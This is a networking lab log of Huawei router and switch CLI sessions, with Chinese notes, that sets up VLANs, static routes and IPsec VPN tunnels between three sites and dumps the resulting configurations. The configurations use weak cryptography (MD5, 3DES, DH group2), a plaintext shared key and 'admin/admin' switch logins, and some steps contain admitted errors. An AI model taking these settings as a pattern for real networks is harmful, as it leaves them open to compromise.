[Huawei-Vlanif2111]int g0/0/3
[Huawei-GigabitEthernet0/0/3]p l a
[Huawei-GigabitEthernet0/0/3]p d v 2111
[Huawei-GigabitEthernet0/0/3]int g0/0/2
[Huawei-GigabitEthernet0/0/2]p l a
[Huawei-GigabitEthernet0/0/2]p d v 2110
可以ping通
青岛:核心交换机
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]undo in en
Info: Information center is disabled.
[Huawei]vlan b 130 128 132 300 160 2110 2111
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]vlan b 130 128 132 300 160 2110 2111 170
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]
[Huawei]int g0/0/2
[Huawei-GigabitEthernet0/0/2]p l a
[Huawei-GigabitEthernet0/0/2]p d v 160
[Huawei-GigabitEthernet0/0/2]int g0/0/3
[Huawei-GigabitEthernet0/0/3]p l a
[Huawei-GigabitEthernet0/0/3]p d v 170
[Huawei-GigabitEthernet0/0/3]int vlanif 160
[Huawei-Vlanif160]ip addr 172.16.0.1 24
[Huawei-Vlanif160]int vlanif 170
[Huawei-Vlanif170]ip addr 172.17.0.1 24
[Huawei-Vlanif170]可以ping通
配置IP
泰安:
核心交换机静态路由
[Huawei-GigabitEthernet0/0/2]int vlanif 300
[Huawei-Vlanif300]ip addr 10.200.200.2 24
[Huawei-Vlanif300]int g0/0/2
[Huawei-GigabitEthernet0/0/2]p l a
[Huawei-GigabitEthernet0/0/2]p d v 300
[Huawei]ip route-static 0.0.0.0 0 10.200.200.1路由器:
[Huawei]sysname art
[art]int g0/0/0
[art-GigabitEthernet0/0/0]int g0/0/1
[art-GigabitEthernet0/0/0]ip addr 10.200.200.1 24
[art-GigabitEthernet0/0/0]int g0/0/1
[art-GigabitEthernet0/0/1]ip addr 10.20.20.2 24
[arq]ip route-static 0.0.0.0 0.0.0.0 10.20.20.1
青岛
核心交换机静态路由
[Huawei]vlan b 301
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]int vlanif 301
[Huawei-Vlanif301]ip addr 10.100.100.2 24
[Huawei-Vlanif301]int g0/0/1
[Huawei-GigabitEthernet0/0/1]p l a
[Huawei-GigabitEthernet0/0/1]p d v 301
[Huawei-GigabitEthernet0/0/1]q
[Huawei]ip route-static 0.0.0.0 0 10.100.100.1Enter system view, return user view with Ctrl+Z.
[Huawei]sysname ar1
[ar1]sysname arq
[arq]undo info en
Info: Information center is disabled.
[arq]int g0/0/0
[arq-GigabitEthernet0/0/0]ip addr 10.10.10.2 24
[arq-GigabitEthernet0/0/0]int g0/0/1
[arq-GigabitEthernet0/0/1]ip addr 10.100.100.1 24
[arq]ip route-static 0.0.0.0 0.0.0.0 10.10.10.1济南:
<Huawei>sys
Enter system view, return user view with Ctrl+Z.
[Huawei]sysname arj
[arj]int g0/0/1
[arj-GigabitEthernet0/0/1]ip addr 10.30.30.2 24
[arj-GigabitEthernet0/0/1]q
[arj]undo info en
Info: Information center is disabled.
[arj]ip route-s
[arj]ip route-static 0.0.0.0 0.0.0.0 10.30.30.1公网可以与青岛、济南相互ping通:
配置IPSEC
泰安
[art]acl 3000
[art-acl-adv-3000]rule permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255.255
[art-acl-adv-3000]rule 100 deny ip
[art-acl-adv-3000]ipsec proposal test
[art-ipsec-proposal-test]encapsulation-mode tunnel
[art-ipsec-proposal-test]transform esp
[art-ipsec-proposal-test]esp authentication-algorithm sha1
[art-ipsec-proposal-test]esp encryption-algorithm 3des
[art-ipsec-proposal-test]ike proposal 1
[art-ike-proposal-1]authentication-method pre-share
[art-ike-proposal-1]authentication-algorithm md5
[art-ike-proposal-1]dh group2
[art-ike-proposal-1]ike peer test v2
[art-ike-peer-test]pre-shared-key cipher gdeie
[art-ike-peer-test]remote-address 10.10.10.2
[art-ike-peer-test]ipsec policy RT-RQ-IPSecVPN 1 isakmp
[art-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]ike-peer test
[art-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]proposal test
[art-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]security acl 3000
[art-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]int g0/0/1
[art-GigabitEthernet0/0/1]ipsec policy RT-RQ-IPSecVPN
[art]ip route-static 172.30.0.0 255.255.0.0 10.200.200.2青岛
<arq>sys
Enter system view, return user view with Ctrl+Z.
[arq]acl 3000
[arq-acl-adv-3000]rule permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255.255
[arq-acl-adv-3000]rule 100 deny ip
[arq-acl-adv-3000]ipsec proposal test
[arq-ipsec-proposal-test]encapsulation-mode tunnel
[arq-ipsec-proposal-test]transform esp
[arq-ipsec-proposal-test]esp authentication-algorithm sha1
[arq-ipsec-proposal-test]esp encryption-algorithm 3des
[arq-ipsec-proposal-test]ike proposal 1
[arq-ike-proposal-1]authentication-method pre-share
[arq-ike-proposal-1]authentication-algorithm md5
[arq-ike-proposal-1]dh group2
[arq-ike-proposal-1]ike peer test v2
[arq-ike-peer-test]pre-shared-key cipher gdeie
[arq-ike-peer-test]remote-address 10.20.20.2
[arq-ike-peer-test]ipsec policy RT-RQ-IPSecVPN 1 isakmp
[arq-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]ike-peer test
[arq-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]proposal test
[arq-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]security acl 3000
[arq-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]int g0/0/0
[arq-GigabitEthernet0/0/0]ipsec policy RT-RQ-IPSecVPN
[arq]ip route-static 172.16.0.0 255.255.0.0 10.100.100.2
[arq]ip route-static 172.17.0.0 255.255.0.0 10.100.100.2
济南
济南和青岛再次建立IPSEC隧道:
核心交换机
[Huawei]vlan b 302
Info: This operation may take a few seconds. Please wait for a moment...done.
[Huawei]int vlanif 302
[Huawei-Vlanif302]ip addr 10.50.50.2 24
[Huawei-Vlanif302]p d a
Error: Domain does not exist.Please make sure whether the input is correct.
[Huawei-Vlanif302]int g0/0/1
[Huawei-GigabitEthernet0/0/1] p l a
[Huawei-GigabitEthernet0/0/1]p d v 302
[Huawei-GigabitEthernet0/0/1]q
[Huawei]ip route-static 0.0.0.0 0 10.50.50.1
[Huawei]ping 10.50.50.1
PING 10.50.50.1: 56 data bytes, press CTRL_C to break
Reply from 10.50.50.1: bytes=56 Sequence=1 ttl=255 time=30 ms
Reply from 10.50.50.1: bytes=56 Sequence=2 ttl=255 time=40 ms
Reply from 10.50.50.1: bytes=56 Sequence=3 ttl=255 time=40 ms
Reply from 10.50.50.1: bytes=56 Sequence=4 ttl=255 time=50 ms
Reply from 10.50.50.1: bytes=56 Sequence=5 ttl=255 time=20 ms
--- 10.50.50.1 ping statistics ---
5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 20/36/50 ms
[Huawei]济南路由器
单IP多隧道容易出现问题,此处可能存在问题,可以直接忽略本步骤
[arj]int g0/0/0
[arj-GigabitEthernet0/0/0]ip addr 10.50.50.1 24
[arj-GigabitEthernet0/0/0]acl 3000
[arj-acl-adv-3000]rule permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255.255
[arj-acl-adv-3000]rule 100 deny ip
[arj-acl-adv-3000]ipsec proposal test
[arj-ipsec-proposal-test]encapsulation-mode tunnel
[arj-ipsec-proposal-test]transform esp
[arj-ipsec-proposal-test]esp authentication-algorithm sha1
[arj-ipsec-proposal-test]esp encryption-algorithm 3des
[arj-ipsec-proposal-test]ike proposal 1
[arj-ike-proposal-1]authentication-method pre-share
[arj-ike-proposal-1]authentication-algorithm md5
[arj-ike-proposal-1]dh group2
[arj-ike-proposal-1]ike peer test v2
[arj-ike-peer-test]pre-shared-key cipher gdeie
[arj-ike-peer-test]remote-address 10.10.20.2
[arj-ike-peer-test]ipsec policy RT-RQ-IPSecVPN 1 isakmp
[arj-ipsec-policy-isakmp-RT-RQ-IPSecVPN-1]ipsec policy RJ-RQ-IPSecVPN 1 isakmp
[arj-ipsec-policy-isakmp-RJ-RQ-IPSecVPN-1]ike-peer test
[arj-ipsec-policy-isakmp-RJ-RQ-IPSecVPN-1]proposal test
[arj-ipsec-policy-isakmp-RJ-RQ-IPSecVPN-1]security acl 3000
[arj-ipsec-policy-isakmp-RJ-RQ-IPSecVPN-1]int g0/0/1
[arj-GigabitEthernet0/0/1]ipsec policy RJ-RQ-IPSecVPN
[arj-GigabitEthernet0/0/1]ip route-static 172.121.0.0 255.255.0.0 10.50.50.2
[arj]ip route-static 172.21.0.0 255.255.0.0 10.50.50.2
[arj]undo ip route-static 172.121.0.0 255.255.0.0 10.50.50.2
路由可以ping通核心交换机下面的地址:
青岛,第二个IPSEC,与济南进行连通
需要第二个IP,单IP多隧道容易出现问题。此处可能存在问题,可以直接忽略本步骤
[arq]acl 3001
[arq-acl-adv-3001]rule permit ip source 172.16.0.0 0.15.255.255 destination 172.21.0.0 0.0.255.255
[arq-acl-adv-3001]rule deny ip
[arq-acl-adv-3001]ipsec proposal rq-rj
[arq-ipsec-proposal-rq-rj]encapsulation-mode tunnel
[arq-ipsec-proposal-rq-rj]transform esp
[arq-ipsec-proposal-rq-rj]esp authentication-algorithm sha1
[arq-ipsec-proposal-rq-rj]esp encryption-algorithm 3des
[arq-ipsec-proposal-rq-rj]ike proposal 2
[arq-ike-proposal-2]authentication-method pre-share
[arq-ike-proposal-2]authentication-algorithm md5
[arq-ike-proposal-2]dh group2
[arq-ike-proposal-2]ike peer rq-rj v2
[arq-ike-peer-rq-rj]remote-address 10.30.30.2
[arq-ike-peer-rq-rj]ipsec policy RQ-RJ-IPsecVPN 1 isakmp
[arq-ipsec-policy-isakmp-RQ-RJ-IPsecVPN-1]ike-peer rq-rj
[arq-ipsec-policy-isakmp-RQ-RJ-IPsecVPN-1]proposal rq-rj
[arq-ipsec-policy-isakmp-RQ-RJ-IPsecVPN-1]security acl 3001
[arq-ipsec-policy-isakmp-RQ-RJ-IPsecVPN-1]int g0/0/2
[arq-GigabitEthernet0/0/2]ipsec policy RQ-RJ-IPsecVPN
查看状态:
路由器可以ping通子网172
ARQ:
ART:
IPSEC测试:泰安云中心成功通过IPSEC,ping通青岛172.16.0.0/16网段!成功PING通
泰安云中心成功ping通青岛172.16.0.0/16网段!成功PING通
具体公网抓包:
IPSEC测试2:泰安校区云中心成功通过IPSEC,ping通青岛172.17.0.0/16网段。
抓包。
大拓扑:配置文件
AR5
[Huawei]dis current-configuration
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 10.30.30.1 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 10.1.1.1 255.255.255.0
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
rip 1
version 2
network 10.0.0.0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
[Huawei]
[Huawei]AR2
[Huawei]dis current-configuration
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 10.1.1.2 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 10.2.2.2 255.255.255.0
#
interface GigabitEthernet0/0/2
ip address 10.20.20.1 255.255.255.0
#
interface NULL0
#
rip 1
version 2
network 10.0.0.0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
[Huawei]AR3
[Huawei]dis current-configuration
[V200R003C00]
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 10.2.2.3 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 10.10.10.1 255.255.255.0
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
rip 1
version 2
network 10.0.0.0
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
[Huawei]ARJ
<arj>dis current-configuration
[V200R003C00]
#
sysname arj
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
acl number 3000
rule 5 permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255
.255
rule 100 deny ip
#
ipsec proposal test
esp authentication-algorithm sha1
esp encryption-algorithm 3des
#
ike proposal 1
dh group2
authentication-algorithm md5
#
ike peer test v2
pre-shared-key cipher %$%$u#%,6(dQAZ/e99XOocC@,.2n%$%$
remote-address 10.10.10.2
#
ipsec policy RJ-RQ-IPSecVPN 1 isakmp
security acl 3000
ike-peer test
proposal test
ipsec policy RT-RQ-IPSecVPN 1 isakmp
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 10.50.50.1 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 10.30.30.2 255.255.255.0
ipsec policy RJ-RQ-IPSecVPN
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 10.30.30.1
ip route-static 172.21.0.0 255.255.0.0 10.50.50.2
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
<arj>ART
<art>save
The current configuration will be written to the device.
Are you sure to continue? (y/n)[n]:y
It will take several minutes to save configuration file, please wait........
Configuration file had been saved successfully
Note: The configuration file will take effect after being activated
<art>
<art>
Please check whether system data has been changed, and save data in time
Configuration console time out, please press any key to log on
<art>dis cu
<art>dis current-configuration
[V200R003C00]
#
sysname art
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
acl number 3000
rule 5 permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255
.255
rule 100 deny ip
#
ipsec proposal test
esp authentication-algorithm sha1
esp encryption-algorithm 3des
#
ike proposal 1
dh group2
authentication-algorithm md5
#
ike peer test v2
pre-shared-key cipher %$%$u#%,6(dQAZ/e99XOocC@,.2n%$%$
remote-address 10.10.10.2
#
ipsec policy RT-RQ-IPSecVPN 1 isakmp
security acl 3000
ike-peer test
proposal test
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 10.200.200.1 255.255.255.0
#
interface GigabitEthernet0/0/1
ip address 10.20.20.2 255.255.255.0
ipsec policy RT-RQ-IPSecVPN
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 10.20.20.1
ip route-static 172.30.0.0 255.255.0.0 10.200.200.2
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
<art>
ARQ
<arq>dis current-configuration
[V200R003C00]
#
sysname arq
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
set cpu-usage threshold 80 restore 75
#
acl number 3000
rule 5 permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255
.255
rule 100 deny ip
acl number 3001
rule 5 permit ip source 172.16.0.0 0.15.255.255 destination 172.21.0.0 0.0.255.
255
rule 10 deny ip
#
ipsec proposal test
esp authentication-algorithm sha1
esp encryption-algorithm 3des
ipsec proposal rq-rj
esp authentication-algorithm sha1
esp encryption-algorithm 3des
#
ike proposal 1
dh group2
authentication-algorithm md5
#
ike proposal 2
dh group2
authentication-algorithm md5
#
ike peer rq-rj v2
remote-address 10.30.30.2
ike peer test v2
pre-shared-key cipher %$%$u#%,6(dQAZ/e99XOocC@,.2n%$%$
remote-address 10.20.20.2
#
ipsec policy RQ-RJ-IPsecVPN 1 isakmp
security acl 3001
ike-peer rq-rj
<arq>
<arq>
<arq>dis cu
<arq>dis current-configuration
[V200R003C00]
#
sysname arq
#
snmp-agent local-engineid 800007DB03000000000000
snmp-agent
#
clock timezone China-Standard-Time minus 08:00:00
#
portal local-server load flash:/portalpage.zip
#
drop illegal-mac alarm
#
undo info-center enable
#
wlan ac-global carrier id other ac id 0
#
set cpu-usage threshold 80 restore 75
#
acl number 3000
rule 5 permit ip source 172.16.0.0 0.15.255.255 destination 172.16.0.0 0.15.255
.255
rule 100 deny ip
acl number 3001
rule 5 permit ip source 172.16.0.0 0.15.255.255 destination 172.21.0.0 0.0.255.
255
rule 10 deny ip
#
ipsec proposal test
esp authentication-algorithm sha1
esp encryption-algorithm 3des
ipsec proposal rq-rj
esp authentication-algorithm sha1
esp encryption-algorithm 3des
#
ike proposal 1
dh group2
authentication-algorithm md5
#
ike proposal 2
dh group2
authentication-algorithm md5
#
ike peer rq-rj v2
remote-address 10.30.30.2
ike peer test v2
pre-shared-key cipher %$%$u#%,6(dQAZ/e99XOocC@,.2n%$%$
remote-address 10.20.20.2
#
ipsec policy RQ-RJ-IPsecVPN 1 isakmp
security acl 3001
ike-peer rq-rj
proposal rq-rj
ipsec policy RT-RQ-IPSecVPN 1 isakmp
security acl 3000
ike-peer test
proposal test
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password cipher %$%$K8m.Nt84DZ}e#<0`8bmE3Uw}%$%$
local-user admin service-type http
#
firewall zone Local
priority 15
#
interface GigabitEthernet0/0/0
ip address 10.10.10.2 255.255.255.0
ipsec policy RT-RQ-IPSecVPN
#
interface GigabitEthernet0/0/1
ip address 10.100.100.1 255.255.255.0
ipsec policy RQ-RJ-IPsecVPN
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 10.10.10.1
ip route-static 172.16.0.0 255.255.0.0 10.100.100.2
ip route-static 172.17.0.0 255.255.0.0 10.100.100.2
#
user-interface con 0
authentication-mode password
user-interface vty 0 4
user-interface vty 16 20
#
wlan ac
#
return
<arq>LSW3
<Huawei>dis current-configuration
#
sysname Huawei
#
undo info-center enable
#
vlan batch 128 130 132 160 300 302 2110 to 2111
#
cluster enable
ntdp enable
ndp enable
#
drop illegal-mac alarm
#
diffserv domain default
#
drop-profile default
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password simple admin
local-user admin service-type http
#
interface Vlanif1
#
interface Vlanif302
ip address 10.50.50.2 255.255.255.0
#
interface Vlanif2110
ip address 172.21.10.1 255.255.255.0
#
interface Vlanif2111
ip address 172.21.11.1 255.255.255.0
#
interface MEth0/0/1
#
interface GigabitEthernet0/0/1
port link-type access
port default vlan 302
#
interface GigabitEthernet0/0/2
port link-type access
port default vlan 2110
#
interface GigabitEthernet0/0/3
port link-type access
port default vlan 2111
#
...
#
interface GigabitEthernet0/0/24
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 10.50.50.1
#
user-interface con 0
user-interface vty 0 4
#
return
<Huawei>LSW1
<Huawei>dis current-configuration
#
sysname Huawei
#
undo info-center enable
#
vlan batch 128 130 132 160 300 2110
#
cluster enable
ntdp enable
ndp enable
#
drop illegal-mac alarm
#
diffserv domain default
#
drop-profile default
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password simple admin
local-user admin service-type http
#
interface Vlanif1
#
interface Vlanif128
ip address 172.30.128.1 255.255.255.0
#
interface Vlanif130
ip address 172.30.130.1 255.255.255.0
#
interface Vlanif132
ip address 172.30.132.1 255.255.255.0
#
interface Vlanif300
ip address 10.200.200.2 255.255.255.0
#
interface MEth0/0/1
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 2 to 4094
#
interface GigabitEthernet0/0/2
port link-type access
port default vlan 300
#
interface GigabitEthernet0/0/3
#
interface GigabitEthernet0/0/4
#
interface GigabitEthernet0/0/5
...
#
interface GigabitEthernet0/0/22
#
interface GigabitEthernet0/0/23
#
interface GigabitEthernet0/0/24
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 10.200.200.1
#
user-interface con 0
user-interface vty 0 4
#
return
<Huawei>
<Huawei>LSW4
<Huawei>save
The current configuration will be written to the device.
Are you sure to continue?[Y/N]y
Info: Please input the file name ( *.cfg, *.zip ) [vrpcfg.zip]:
Now saving the current configuration to the slot 0.
Save the configuration successfully.
<Huawei>
<Huawei>dis cur
<Huawei>dis current-configuration
#
sysname Huawei
#
undo info-center enable
#
vlan batch 128 130 132 160 300 2110
#
cluster enable
ntdp enable
ndp enable
#
drop illegal-mac alarm
#
diffserv domain default
#
drop-profile default
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password simple admin
local-user admin service-type http
#
interface Vlanif1
#
interface MEth0/0/1
#
interface Ethernet0/0/1
port link-type trunk
port trunk allow-pass vlan 2 to 4094
#
interface Ethernet0/0/2
port link-type trunk
port trunk allow-pass vlan 2 to 4094
#
interface Ethernet0/0/3
port link-type access
port default vlan 132
#
interface Ethernet0/0/4
port link-type access
port default vlan 128
#
interface Ethernet0/0/5
port link-type access
port default vlan 128
#
interface Ethernet0/0/6
#
interface Ethernet0/0/7
#
interface Ethernet0/0/8
#
interface Ethernet0/0/9
#
interface Ethernet0/0/10
...
#
interface Ethernet0/0/21
#
interface Ethernet0/0/22
#
interface GigabitEthernet0/0/1
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
user-interface con 0
user-interface vty 0 4
#
return
<Huawei>
<Huawei>LSW5
<Huawei> DIS CUR
#
sysname Huawei
#
undo info-center enable
#
vlan batch 128 130 132 160 300 2110
#
cluster enable
ntdp enable
ndp enable
#
drop illegal-mac alarm
#
diffserv domain default
#
drop-profile default
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password simple admin
local-user admin service-type http
#
interface Vlanif1
#
interface MEth0/0/1
#
interface Ethernet0/0/1
port link-type trunk
port trunk allow-pass vlan 2 to 4094
#
interface Ethernet0/0/2
port link-type access
port default vlan 130
#
interface Ethernet0/0/3
#
interface Ethernet0/0/4
#
interface Ethernet0/0/5
#
interface Ethernet0/0/6
#
interface Ethernet0/0/7
#
interface Ethernet0/0/8
#
interface Ethernet0/0/9
#
interface Ethernet0/0/10
#
interface Ethernet0/0/11
#
...
interface Ethernet0/0/22
#
interface GigabitEthernet0/0/1
#
interface GigabitEthernet0/0/2
#
interface NULL0
#
user-interface con 0
user-interface vty 0 4
#
return
<Huawei>LSW2
<Huawei>dis current-configuration
#
sysname Huawei
#
undo info-center enable
#
vlan batch 128 130 132 160 170 300 to 301 2110 to 2111
#
cluster enable
ntdp enable
ndp enable
#
drop illegal-mac alarm
#
diffserv domain default
#
drop-profile default
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password simple admin
local-user admin service-type http
#
interface Vlanif1
#
interface Vlanif160
ip address 172.16.0.1 255.255.255.0
#
interface Vlanif170
ip address 172.17.0.1 255.255.255.0
#
interface Vlanif301
ip address 10.100.100.2 255.255.255.0
#
interface MEth0/0/1
#
interface GigabitEthernet0/0/1
port link-type access
port default vlan 301
#
interface GigabitEthernet0/0/2
port link-type access
port default vlan 160
#
interface GigabitEthernet0/0/3
port link-type access
port default vlan 170
#
interface GigabitEthernet0/0/4
#
...
interface GigabitEthernet0/0/21
#
interface GigabitEthernet0/0/22
#
interface GigabitEthernet0/0/23
#
interface GigabitEthernet0/0/24
#
interface NULL0
#
ip route-static 0.0.0.0 0.0.0.0 10.100.100.1
#
user-interface con 0
user-interface vty 0 4
#
return
<Huawei>
<Huawei>0xff:文件下载
